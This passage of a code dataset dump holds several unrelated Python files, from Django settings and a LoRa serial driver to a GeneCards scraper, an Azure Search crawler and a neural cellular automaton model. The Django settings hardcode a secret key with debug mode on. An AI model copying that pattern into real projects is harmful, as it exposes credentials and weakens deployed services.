This method is marked private\n even though it's called from AreaManager, because it must only be called once per area focus.\n\n Args:\n data: JSON contents of the Tiled map.\n \"\"\"\n # Reset variables left over from the last map.\n if self.layers:\n self.layers = []\n if self.tilesets:\n self.tilesets = []\n\n # Load the JSON data.\n self.__tilemap = data\n\n # Set class attributes representing information about the map.\n self.width = self.__tilemap[\"width\"]\n self.height = self.__tilemap[\"height\"]\n self.tilewidth = self.__tilemap[\"tilewidth\"]\n self.tileheight = self.__tilemap[\"tileheight\"]\n if \"properties\" in self.__tilemap:\n self.properties = self.__tilemap[\"properties\"]\n\n # Call the on_enter event if set.\n if \"on_enter\" in self.properties:\n self.area.driftwood.script.call(*self.properties[\"on_enter\"].split(':'))\n\n # Set the window title.\n if \"title\" in self.properties:\n self.area.driftwood.window.title(self.properties[\"title\"])\n\n # Build the tileset abstractions.\n for ts in self.__tilemap[\"tilesets\"]:\n self.tilesets.append(tileset.Tileset(self, ts))\n\n # Global object layer.\n gobjlayer = {}\n\n # Build the tile and layer abstractions.\n for zpos, l in enumerate(self.__tilemap[\"layers\"]):\n # This layer is marked invisible, skip it.\n if not l[\"visible\"]:\n continue\n\n # This is a tile layer.\n if l[\"type\"] == \"tilelayer\":\n self.layers.append(layer.Layer(self, l, zpos))\n\n # This is an object layer.\n elif l[\"type\"] == \"objectgroup\":\n # If this is the very first layer, it's the global object layer.\n if not self.layers:\n gobjlayer = l\n\n else:\n self.layers[-1]._process_objects(l)\n\n # Merge the global object layer into all tile layers.\n if gobjlayer:\n for l in self.layers:\n l._process_objects(gobjlayer)\n","sub_path":"src/tilemap.py","file_name":"tilemap.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"595931935","text":"# Read in the data.\r\nimport csv\r\n\r\nf = open('D:\\dataquest\\projects\\hacker_news.csv')\r\nhn = list(csv.reader(f))\r\nhn[:5]\r\nheaders = hn[0]\r\nhn = hn[1:]\r\nprint(headers)\r\nprint(hn[:5])\r\n# Identify posts that begin with either `Ask HN` or `Show HN` and separate the data into different lists.\r\nask_posts = []\r\nshow_posts =[]\r\nother_posts = []\r\n\r\nfor post in hn:\r\n title = post[1]\r\n if title.lower().startswith(\"ask hn\"):\r\n ask_posts.append(post)\r\n elif title.lower().startswith(\"show hn\"):\r\n show_posts.append(post)\r\n else:\r\n other_posts.append(post)\r\n \r\nprint(len(ask_posts))\r\nprint(len(show_posts))\r\nprint(len(other_posts))\r\n\r\n# Calculate the average number of comments `Ask HN` posts receive.\r\ntotal_ask_comments = 0\r\n\r\nfor post in ask_posts:\r\n total_ask_comments += int(post[4])\r\n \r\navg_ask_comments = total_ask_comments / len(ask_posts)\r\nprint(avg_ask_comments)\r\n\r\ntotal_show_comments = 0\r\n\r\nfor post in show_posts:\r\n total_show_comments += int(post[4])\r\n \r\navg_show_comments = total_show_comments / len(show_posts)\r\nprint(avg_show_comments)\r\n\r\n# Calculate the amount of ask posts created during each hour of day and the number of comments received.\r\nimport datetime as dt\r\n\r\nresult_list = []\r\n\r\nfor post in ask_posts:\r\n result_list.append(\r\n [post[6], int(post[4])]\r\n )\r\n\r\ncomments_by_hour = {}\r\ncounts_by_hour = {}\r\ndate_format = \"%m/%d/%Y %H:%M\"\r\n\r\nfor each_row in result_list:\r\n date = 
each_row[0]\r\n comment = each_row[1]\r\n time = dt.datetime.strptime(date, date_format).strftime(\"%H\")\r\n if time in counts_by_hour:\r\n comments_by_hour[time] += comment\r\n counts_by_hour[time] += 1\r\n else:\r\n comments_by_hour[time] = comment\r\n counts_by_hour[time] = 1\r\n\r\ncomments_by_hour\r\n\r\n# Calculate the average amount of comments `Ask HN` posts created at each hour of the day receive.\r\navg_by_hour = []\r\n\r\nfor hr in comments_by_hour:\r\n avg_by_hour.append([hr, comments_by_hour[hr] / counts_by_hour[hr]])\r\n\r\navg_by_hour\r\n\r\nswap_avg_by_hour = []\r\n\r\nfor row in avg_by_hour:\r\n swap_avg_by_hour.append([row[1], row[0]])\r\n \r\nprint(swap_avg_by_hour)\r\n\r\nsorted_swap = sorted(swap_avg_by_hour, reverse=True)\r\n\r\nsorted_swap\r\n\r\n# Sort the values and print the the 5 hours with the highest average comments.\r\n\r\nprint(\"Top 5 Hours for 'Ask HN' Comments\")\r\nfor avg, hr in sorted_swap[:5]:\r\n print(\r\n \"{}: {:.2f} average comments per post\".format(\r\n dt.datetime.strptime(hr, \"%H\").strftime(\"%H:%M\"),avg\r\n )\r\n )\r\n","sub_path":"hackerposts.py","file_name":"hackerposts.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"454672317","text":"# Copyright 2008 Google Inc. All Rights Reserved.\n\n# Django settings for CSSJanus.\n\n__author__ = 'elsigh@google.com (Lindsey Simon)'\n\nimport os\n\n# YOU NEED TO SET THIS VARIABLE TO POINT TO YOUR INSTALL PATH\nCSSJANUS_DIR = os.path.abspath(os.path.dirname(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nLANGUAGE_CODE = 'en'\nTIME_ZONE = 'US/Pacific'\n#DATABASE_ENGINE = 'sqlite3'\nUSE_I18N = True\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n)\ngettext = lambda s: s\nLANGUAGES = (\n ('ar', gettext('Arabic')),\n ('zh_CN', gettext('Chinese')),\n ('en', gettext('English')),\n ('fr', gettext('French')),\n ('he', gettext('Hebrew')),\n ('de', gettext('German')),\n ('ja', gettext('Japanese')),\n ('fa', gettext('Persian')),\n)\n\nTEMPLATE_DIRS = (\n CSSJANUS_DIR\n)\nADMINS = (\n ('Lindsey Simon', __author__),\n)\nMANAGERS = ADMINS\nUSE_ETAGS=True\nSECRET_KEY = 'jvs30_ok!o!gf)dfao)#r+jz$%^s%-mxwxy*$2fgj46-j@=i*c'\nROOT_URLCONF = 'django_urls'\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'cssjanus'\n)\nSESSION_ENGINE = 'gae_sessions'\n","sub_path":"django_settings.py","file_name":"django_settings.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"408145635","text":"import serial\nimport time\nclass lora:\n def __init__(self,port=\"/dev/ttyS0\",baudrate=9600,init=False):\n if init:self.init_lora_device(port)\n self.ser = serial.Serial(port,baudrate=baudrate,timeout=0.5)\n self.AT_command(\"AT+ADDRESS=6\",time_sleep=0.2)\n self.AT_command(\"AT+PARAMETER=12,7,1,4\",time_sleep=0.2)\n self.AT_command(\"AT+IPR=9600\",time_sleep=0.2)\n self.AT_command(\"AT+NETWORKID=6\",time_sleep=0.2)\n #self.AT_command(self.ser,\"AT+CPIN?\")\n \n def AT_command(self,cmd,time_sleep=1):\n # check AT command format\n cmd = cmd if cmd[-2:]==\"\\r\\n\" else cmd+\"\\r\\n\"\n self.ser.write(cmd.encode())\n time.sleep(time_sleep)\n print(f\"{cmd.split('=')[0][3:]} > {self.ser.read(10).decode('UTF-8')}\")\n \n def 
send(self,message,address=713):\n length = len(str(message))\n self.AT_command(f\"AT+SEND={address},{length},{message}\\r\\n\")\n \n def init_lora_device(self,port):\n s = serial.Serial(port,baudrate=115200)\n s.write(\"AT+IPR=9600\\r\\n\".encode())\n print(f\"init Done\")\n s.close()\n time.sleep(1)\n def close(self):\n self.ser.close()\n \n \n \n \nif __name__ == \"__main__\" :\n _lora = lora(init=True)\n for _ in range(10): _lora.send(\"send to 713\")\n _lora.close()\n ","sub_path":"Lora.py","file_name":"Lora.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"250913665","text":"import numpy as np\nimport cv2\n\ncamera = cv2.VideoCapture(0)\ncamera.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncamera.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\n# threshold: 입력이미지가 그레이 스케일 이미지여야 한다.\n\n# ADAPTIVE_THRESH_MEAN_C와 함께 adaptiveThreshold 함수를 사용하면 앞에서 검은색으로 검출된 부분의 글씨가 검출됩니다.\n# 첫번째 아규먼트는 원본 이미지, 두번째 아규먼트는 임계값 이상일 경우 픽셀값, 세번째 아규먼트는 적응형 이진화 타입,\n# 네번째 아규먼트는 이진화 타입, 다섯째 아규먼트는 임계값 계산시 함께 볼 주변 픽셀의 범위를 블럭 크기로 지정,\n# 여섯번째 아규먼트는 평균 또는 가중평균에서 뺄 값입니다.\n\nwhile True:\n\n ret, frame = camera.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 50, 150, apertureSize=3)\n lines = cv2.HoughLines(edges, 1, np.pi / 180, 100)\n\n ret, img_result1 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n ret, img_result2 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY_INV)\n\n for i in range(len(lines)):\n print(i)\n for rho, theta in lines[i]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n\n cv2.line(img_result1, (x1, y1), (x2, y2), (0, 0, 255), 2)\n\n # ret, img_result2 = cv2.threshold(frame, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n cv2.imshow(\"VideoFrame\", frame)\n cv2.imshow(\"THRESH_BINARY\", img_result1)\n # cv2.imshow(\"THRESH_OTSU\", img_result2)\n\n if cv2.waitKey(1) > 0: break\n\ncamera.release()\ncv2.destroyAllWindows()\n","sub_path":"opencv/lineDetection.py","file_name":"lineDetection.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"79639995","text":"import jax.numpy as jnp\nimport pytest\n\nfrom gpjax.types import Dataset, NoneType, verify_dataset\n\n\ndef test_nonetype():\n assert isinstance(None, NoneType)\n\n\n@pytest.mark.parametrize(\"n\", [1, 10, 100])\n@pytest.mark.parametrize(\"outd\", [1, 2, 10])\n@pytest.mark.parametrize(\"ind\", [1, 2, 10])\ndef test_dataset(n, outd, ind):\n x = jnp.ones((n, ind))\n y = jnp.ones((n, outd))\n d = Dataset(X=x, y=y)\n verify_dataset(d)\n assert d.n == n\n assert d.in_dim == ind\n assert d.out_dim == outd\n\n\n@pytest.mark.parametrize(\"nx, ny\", [(1, 2), (2, 1), (10, 5), (5, 10)])\ndef test_dataset_assertions(nx, ny):\n x = jnp.ones((nx, 1))\n y = jnp.ones((ny, 1))\n with pytest.raises(AssertionError):\n ds = Dataset(X=x, y=y)\n verify_dataset(ds)\n\n\ndef test_y_none():\n x = jnp.ones((10, 1))\n d = Dataset(X=x)\n verify_dataset(d)\n assert d.y is None\n","sub_path":"tests/test_types.py","file_name":"test_types.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"297947438","text":"from dogLib import Dog\n\npup = Dog(__file__)\nprint(pup.__doc__)\n\n# print(pup.__file__)\n# hello there\n\nplist = 
pup.get_products()\nprint(plist)\n\ndataset = 'LANDSAT_8_C1'\n\nentlist = pup.hunt(path=47, row=26, product=dataset)\nfor it in entlist:\n    print(it)\n\n\n# ------------------------------- LANDSAT 7 -------------------------\n\n\ndataset = 'LANDSAT_ETM_C1'\n\nentlist = pup.hunt(path=47, row=26, product=dataset)\nfor it in entlist:\n    print(it)\n\n\n\n\n\n\n# ----------------------------------- LANDSAT 5 minus? ---------------------------\n\ndataset = 'LANDSAT_TM_C1'\n\nentlist = pup.hunt(path=47, row=26, product=dataset)\nfor it in entlist:\n    print(it)\n\nprint(entlist[0])\n\n","sub_path":"test/simpleL8TestCase.py","file_name":"simpleL8TestCase.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"103447388","text":"\"\"\"\n    Base class for UI Agents\n    \n    Also provides the system clock\n    \n    Created on 2010-08-19\n    @author: jldupont\n\"\"\"\nimport gtk\nfrom Queue import Queue\nfrom jld_scripts.system import mswitch\nfrom jld_scripts.system.base import process_queues, message_processor\n\n__all__=[\"UiAgentBase\"]\n\nclass UiAgentBase(object):\n    \n    REFRESH_TIMEOUT=10\n    LOW_PRIORITY_MESSAGE_BURST_SIZE=5\n    \n    def __init__(self, time_base):\n        \"\"\"\n        @param time_base: in milliseconds\n        @param glade_file: absolute file path to the ui glade XML file\n        @param ui_window_class: class object for the ui window \n        \"\"\"\n        self.time_base=time_base \n        self.ticks_second=1000/time_base\n\n        self.iq=Queue()\n        self.isq=Queue()\n        mswitch.subscribe(\"__main__\", self.iq, self.isq)\n\n        self.tick_count=0\n        self.sec_count=0\n        self.min_count=0\n        self.hour_count=0\n        self.day_count=0\n\n        self.window=None\n        \n        self.interests={}\n        self.responsesInterests=[]\n        \n        \n    def h_app_show(self, *_):\n        \"\"\" We should show the main application window\n        \"\"\"\n        if self.window is None:\n            self.window=self.ui_window_class(self.glade_file)\n            self.do_updates()\n        \n    def h_app_close(self, *_):\n        \"\"\" Seems that the application window was closed...\n        \"\"\"\n        self.window=None\n\n    def h_app_exit(self, *_):\n        self.on_destroy()\n\n    def on_destroy(self):\n        gtk.main_quit()\n        \n    def do_updates(self):\n        \"\"\"\n        The ui window must be updated\n        \"\"\"\n        raise RuntimeError(\"must be implemented\")\n\n    def refreshUi(self):\n        \"\"\"\n        This can be subclassed - it will be called every REFRESH_TIMEOUT seconds\n        \"\"\"\n\n    def tick(self, *_):\n        \"\"\"\n        Performs message dispatch\n        \"\"\"\n        tick_min=False\n        tick_hour=False\n        tick_day=False\n        tick_second = (self.tick_count % self.ticks_second) == 0 \n        self.tick_count += 1\n        \n        if tick_second:\n            self.sec_count += 1\n\n            if (self.sec_count % self.REFRESH_TIMEOUT)==0:\n                self.refreshUi()\n\n            tick_min=(self.sec_count % 60)==0\n            if tick_min:\n                self.min_count += 1\n            \n            tick_hour=(self.min_count % 60)==0\n            if tick_hour:\n                self.hour_count += 1\n            \n            tick_day=(self.hour_count % 24)==0\n            if tick_day:\n                self.day_count += 1\n        \n        #print \"tick! 
", tick_second\n        mswitch.publish(\"__main__\", \"__tick__\", self.ticks_second, \n                tick_second, tick_min, tick_hour, tick_day, \n                self.sec_count, self.min_count, self.hour_count, self.day_count)\n        \n        #(src_agent, agent_name, agent_id, \n        # interest_map, responsesInterestList, \n        # iq, isq, processor, low_priority_burst_size=5)\n        quit=process_queues(self, \"__main__\", \"__main__\", \n                            self.interests, self.responsesInterests,\n                            self.iq, self.isq, message_processor \n                            )\n        if quit:\n            self.on_destroy()\n        \n        \"\"\"\n        while True:\n            try: \n                envelope=self.isq.get(False)\n                quit, mtype, handled=mdispatch(self, \"__main__\", envelope)\n                if handled==False:\n                    mswitch.publish(self.__class__, \"__interest__\", (mtype, False, self.isq))\n                if quit:\n                    self.on_destroy()\n                    break\n                \n            except Empty:\n                break\n            continue            \n        \n        burst=self.LOW_PRIORITY_MESSAGE_BURST_SIZE\n        \n        while True:\n            try: \n                envelope=self.iq.get(False)\n                quit, mtype, handled=mdispatch(self, \"__main__\", envelope)\n                if handled==False:\n                    mswitch.publish(self.__class__, \"__interest__\", (mtype, False, self.iq))\n                if quit:\n                    self.on_destroy()\n                    break\n                \n                burst -= 1\n                if burst == 0:\n                    break\n            except Empty:\n                break\n            \n            continue\n        \"\"\"\n        ## for gobject... just in case\n        return True\n","sub_path":"src/jld_scripts/system/ui_base.py","file_name":"ui_base.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"472234455","text":"# 2D Array\n# a. Desc -> A library for reading in 2D arrays of integers, doubles, or booleans from\n# standard input and printing them out to standard output.\n# b. I/P -> M rows, N Cols, and M * N inputs for 2D Array. Use Java Scanner Class\n# c. Logic -> create 2 dimensional array in memory to read in M rows and N cols\n# d. O/P -> Print function to print 2 Dimensional Array. 
\ntry:\n    rows = int(input(\"Enter number of Rows: \"))\n    columns = int(input(\"Enter number of columns: \"))\nexcept ValueError:\n    print(\"Please enter a valid integer\")\n    raise SystemExit(1)\ndef twoD_array(rows, columns):\n    array = []\n    for i in range(rows):\n        row = []\n        for j in range(columns):\n            value = int(input(\"Enter the value: \"))\n            row.append(value)\n        array.append(row)\n    return array\n\nprint(twoD_array(rows,columns)) \n","sub_path":"2DArray.py","file_name":"2DArray.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"504432883","text":"import matplotlib as mpl\nmpl.use(\"TKAgg\")\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nreal_name=[\"千与千寻\",\"玩具总动员4\",\"黑衣人:全球追击\"]\n# box office figures\nreal_num1=[7548,4013,1673]\nreal_num2=[5453,1840,1080]\nreal_num3=[4348,2345,1890]\n\nx=np.arange(len(real_name))\nplt.bar(x,real_num1,alpha=0.5,width=0.3,label=real_name[0])\nplt.bar([i+0.3 for i in x],real_num2,alpha=0.5,width=0.3,label=real_name[1])\nplt.bar([i+0.6 for i in x],real_num3,alpha=0.5,width=0.3,label=real_name[2])\nx_label=[\"第一天\",\"第二天\",\"第三天\"]\nplt.xticks([i+0.3 for i in x],x_label)\nplt.ylabel(\"票房数\")\nplt.rcParams['font.sans-serif']=['SimHei']\nplt.legend()\nplt.title(\"三天三部电影票房数\")\nplt.show()","sub_path":"Matplotlib图形库/14.柱状图的使用.py","file_name":"14.柱状图的使用.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"114464653","text":"from django.db import models\nfrom MasterEntry.models import Designation,DanceCategory,District\n\n# Create your models here\nGender=(\n    (\"M\",\"Male\"),\n    (\"F\",\"Female\"),\n    (\"O\",\"Others\"),\n)\n\nisActive=(\n    (\"1\",\"Active\"),\n    (\"0\",\"Not Active\"),\n)\n\n\nclass Tutor(models.Model):\n    tutor_name=models.CharField(\"Name:\",max_length=20,null=False)\n    tutor_contact=models.CharField(\"Contact:\",max_length=11,null=False)\n    tutor_email=models.EmailField(\"Email:\",unique=True,null=False,help_text=\"Enter Valid Email\")\n    tutor_gender=models.CharField(\"Gender:\",max_length=5,choices=Gender,null=False)\n    tutor_photo=models.ImageField(\"Tutor Photo:\",upload_to=\"TutorPhoto\",null=False)\n    tutor_dob=models.DateField(\"Date of Birth:\",null=False)\n    tutor_isactive=models.CharField(\"Is Active:\",max_length=5,choices=isActive,null=False,help_text=\"If Value is 1 Tutor is Active and Not Active if 0\")\n    tutor_username=models.CharField(\"User name:\",max_length=15,unique=True,null=False)\n    tutor_password=models.CharField(\"Password:\",max_length=15,unique=True,null=False)\n    \n    tutor_designation=models.ForeignKey(Designation,on_delete=models.SET_NULL,null=True,verbose_name=\"Designation:\")\n    tutor_dancecategory=models.ForeignKey(DanceCategory,on_delete=models.SET_NULL,null=True,verbose_name=\"Dance Category:\")\n    tutor_district=models.ForeignKey(District,on_delete=models.SET_NULL,null=True,verbose_name=\"District:\")\n\n    def __str__(self):\n        return f\"{self.tutor_name}-{self.tutor_designation}\"\n    \n\nclass DanceCourses(models.Model):\n    course_dancecategory=models.ForeignKey(DanceCategory,on_delete=models.SET_NULL,null=True,verbose_name=\"Dance Category:\")\n    course_tutor=models.ForeignKey(Tutor,on_delete=models.SET_NULL,null=True,verbose_name=\"Tutor:\")\n    \n    course_name=models.CharField(\"Name:\",max_length=20,null=False)\n    course_photo=models.ImageField(upload_to=\"CoursePhoto\",null=False)\n    
course_description=models.TextField(\"Description\")\n course_totalfees=models.CharField(\"Total Fees:\",max_length=20,null=False,)\n course_downpayment=models.CharField(\"Down Payment:\",max_length=20,null=False,help_text=\"Online Registration Amount:\")\n course_details=models.FileField(\"Course Syllabus:\",upload_to=\"CourseSyllabus\")\n course_remarks=models.TextField(\"Remarks\")\n \n\n\n\n","sub_path":"Administrator/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"389120728","text":"# Time: O(logn)\n# Space: O(logn)\n\n# 1104\n# In an infinite binary tree where every node has two children, nodes are labelled in row order.\n#\n# In the odd numbered rows (ie., the first, third, fifth,...), the labelling is left to right,\n# while in the even numbered rows (second, fourth, sixth,...), the labelling is right to left.\n# 1\n# 3 2\n# 4 5 6 7\n# 15 14 13 12 11 10 9 8\n#\n# Given the label of a node in this tree, return the labels in the path from the root of\n# the tree to the node with that label.\n\nclass Solution(object):\n def pathInZigZagTree(self, label):\n \"\"\"\n :type label: int\n :rtype: List[int]\n \"\"\"\n count = 2**label.bit_length()\n ans = []\n while label >= 1:\n ans.append(label)\n begin, end = count // 2, count - 1\n label = (begin + (end-label)) // 2\n count //= 2\n return ans[::-1]\n\n def pathInZigZagTree_ming(self, label): # similar but can improve over the above,\n # bit_length on each row doesn't need to campute each time\n ans = [label]\n while label > 1:\n k = label // 2\n b = k.bit_length()\n s, e = 2**(b-1), 2**b - 1\n label = s + (e - k)\n ans.append(label)\n ans.append(label)\n return ans[::-1]\n\nprint(Solution().pathInZigZagTree(14)) # [1,3,4,14]\nprint(Solution().pathInZigZagTree(26)) # [1,2,6,10,26]","sub_path":"Python/path-in-zigzag-labelled-binary-tree.py","file_name":"path-in-zigzag-labelled-binary-tree.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"226527910","text":"\"\"\"\nGeneCards Scraper\n\nThis script uses selenium to scrape the GeneCards database for information and output its results into a .xlsx file.\n\nNote: Chrome is required on the computer.\n\nInstallation:\n\n1. Run the following command to install all dependencies: pip3 install selenium xlsxwriter pandas openpyxl\n2. 
Install the correct version of the Chrome Driver.\n a) Find the Chrome version in Menu > Help > About Google Chrome.\n b) Go to https://pypi.org/project/chromedriver-binary/#history and find the closest version number to your Chrome version.\n c) Copy the install command on the specific version of the chromedriver and install like before.\n\nUsage:\n\npython3 210109_genecards_scrape.py \n\"\"\"\n\nimport argparse\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport chromedriver_binary\nimport xlsxwriter\nimport pandas as pd\nimport os\n\n# initalize command line argument parser\n\nparser = argparse.ArgumentParser(description=\"This script uses selenium to scrape the GeneCards database for information and output its results into a .xlsx file.\")\nparser.add_argument('path', type=str, help='path to target')\nargs = parser.parse_args()\n\n# open input sheet\n\ntry:\n df = pd.read_excel(args.path, 0)\n genes = df[\"Gene ID\"]\nexcept:\n print(\"There was an error opening the spreadsheet.\")\nelse:\n\n row = 0\n\n # initiate output sheet with formatting\n\n workbook = xlsxwriter.Workbook(os.path.splitext(args.path)[0] + '_scraped.xlsx')\n worksheet = workbook.add_worksheet('Sheet1')\n\n cell_format = workbook.add_format()\n bold = workbook.add_format({'bold': True})\n cell_format.set_text_wrap()\n cell_format.set_align(\"top\")\n\n worksheet.set_column(\"A:A\",30,cell_format)\n worksheet.set_column(\"B:B\",40,cell_format)\n worksheet.set_column(\"C:C\",70,cell_format)\n\n # open browser\n\n driver = webdriver.Chrome()\n\n # start through each gene\n\n for gene in genes:\n\n worksheet.write(row, 0, gene)\n\n # open website\n\n try:\n \n driver.get('https://www.genecards.org/cgi-bin/carddisp.pl?gene='+gene)\n #assert \"GeneCards\" in driver.title\n\n # find gene aliases\n\n titles = driver.find_element(By.ID, 'aliases_descriptions')\n columns = titles.find_elements(By.CLASS_NAME, 'gc-subsection')\n\n gene_string = \"\"\n\n columns = [columns[0]]\n\n for column in columns:\n\n item = column.find_elements(By.TAG_NAME, 'li')\n for title in item:\n\n title_nums = title.find_elements(By.TAG_NAME, 'a')\n num_strings = \"\"\n for super in title_nums:\n num_strings += \" \" + super.text\n\n real_title = title.text.replace(num_strings, \"\")\n\n gene_string += real_title + \"\\n\"\n\n # write aliases to sheet\n\n worksheet.write(row, 1, gene_string[0:-1])\n\n # find summaries\n\n summaries = driver.find_element(By.ID, 'summaries')\n summaries = summaries.find_elements(By.CLASS_NAME, 'gc-subsection')\n\n summary_array = []\n\n for summary in summaries:\n\n title = summary.find_element(By.TAG_NAME, 'h3')\n\n if title.text != \"\":\n summary_array.append(bold)\n summary_array.append(title.text)\n\n body = summary.text.replace(title.text, '')\n \n summary_array.append(body + \"\\n\\n\")\n\n # remove extra new lines\n\n ind = len(summary_array)-1\n\n if summary_array[ind] == \"\\n\\n\":\n summary_array.pop(ind)\n else:\n summary_array[ind] = summary_array[ind][0:-4]\n\n # write summary to sheet\n\n worksheet.write_rich_string(row, 2, *summary_array)\n \n print(\"Completed: \"+ gene + \" [\" + str(row+1) + \"/\" + str(len(genes)) + \"]\")\n \n except:\n \n print(\"There was an error processing: \" + gene)\n\n # increment row\n\n row += 1\n\n # close programs\n\n driver.quit()\n 
workbook.close()","sub_path":"genecards-scrape/production/210109_genecards_scrape.py","file_name":"210109_genecards_scrape.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98841209","text":"class Config(object):\n def __init__(self, cfile):\n from json import loads\n config = loads(open(cfile).read())\n \n self.service = config['SERVICE']\n self.index = config['INDEX']\n self.version = config['VERSION']\n self.key = config['KEY']\n self.query = config['QUERY']\n self.output = config['OUTPUT']\n self.fields = config['FIELDS']\n self.dataset = config['DATASET']\n self.columns = config['COLUMNS']\n\nclass Crawler(object):\n def __init__(self, service, index, version):\n self.service = service\n self.index = index\n self.version = version\n \n self.url = 'https://' + service +\\\n '.search.windows.net/indexes/' + index +\\\n '/docs/search?api-version=' + version\n print(self.url)\n \n def searchDocuments(self, key, query={}, headers={}, meta=False, file=False):\n # ate 1000 registros\n from requests import post\n from json import dumps\n from time import time\n \n headers['api-key'] = key\n headers['content-type'] = 'application/json'\n if not query:\n query['search'] = '*'\n \n t0 = time()\n response = post(self.url, headers = headers, json = query).json()\n if not meta:\n response = response['value']\n \n print('Foram retornados', len(response), 'documentos!')\n print('Em', round(time()-t0, 3), 'segundos!')\n \n if file:\n with open(file, 'w') as fl:\n fl.write(dumps(response, indent = 2))\n print('Arquivo', file, 'criado!')\n else:\n return response\n\ndef concatFields(data, fields):\n for field in fields:\n for i in range(len(data)):\n data[i][field] = ' '.join(data[i][field])\n \n print('Campo', field, 'concatenado!')\n \n return data\n\ndef api2dataset(data, file, columns=False):\n import pandas as pd\n dataset = pd.DataFrame.from_dict(data)\n if columns:\n dataset.columns = columns\n \n dataset.to_csv(file, sep = ';', index=False, encoding='utf-8')\n print('Arquivos', file, 'criado!')\n\nif __name__ == '__main__':\n from json import loads\n config = Config('config.json')\n \n # Parametros\n service = config.service\n index = config.index\n version = config.version\n key = config.key\n query = config.query\n output = config.output\n fields = config.fields\n dataset = config.dataset\n columns = config.columns\n \n # Criar raspador\n spider = Crawler(service, index, version)\n \n # Realizar consulta\n spider.searchDocuments(key, query = query, file = output)\n\n # Transformar consulta em dataset\n data = loads(open(output).read())\n data = concatFields(data, fields) # Concatenar valores dos campos de lista em string\n api2dataset(data, dataset, columns)","sub_path":"OneWaySolution-master/01_POC_I/02_azure_search/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547123297","text":"import numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.keras.layers import Conv2D\n\nfrom utils import get_living_mask\n\n\nclass CAModel(tf.keras.Model):\n\n def __init__(self, channel_n=16, fire_rate=0.5):\n super().__init__()\n self.channel_n = channel_n\n self.fire_rate = fire_rate\n\n self.dmodel = tf.keras.Sequential([\n Conv2D(128, 1, activation=tf.nn.relu),\n Conv2D(self.channel_n, 1, activation=None,\n kernel_initializer=tf.zeros_initializer),\n ])\n\n self(tf.zeros([1, 3, 3, 
channel_n])) # dummy call to build the model\n\n @tf.function\n def perceive(self, x, angle=0.0):\n identify = np.float32([0, 1, 0])\n identify = np.outer(identify, identify)\n dx = np.outer([1, 2, 1], [-1, 0, 1]) / 8.0 # Sobel filter\n dy = dx.T\n c, s = tf.cos(angle), tf.sin(angle)\n kernel = tf.stack([identify, c * dx - s * dy, s * dx + c * dy], -1)[:, :, None, :]\n kernel = tf.repeat(kernel, self.channel_n, 2)\n y = tf.nn.depthwise_conv2d(x, kernel, [1, 1, 1, 1], 'SAME')\n return y\n\n @tf.function\n def call(self, x, fire_rate=None, angle=0.0, step_size=1.0):\n pre_life_mask = get_living_mask(x)\n\n y = self.perceive(x, angle)\n dx = self.dmodel(y) * step_size\n if fire_rate is None:\n fire_rate = self.fire_rate\n update_mask = tf.random.uniform(tf.shape(x[:, :, :, :1])) <= fire_rate\n x += dx * tf.cast(update_mask, tf.float32)\n\n post_life_mask = get_living_mask(x)\n life_mask = pre_life_mask & post_life_mask\n return x * tf.cast(life_mask, tf.float32)\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599733111","text":"input_file='file.csv'\nimport 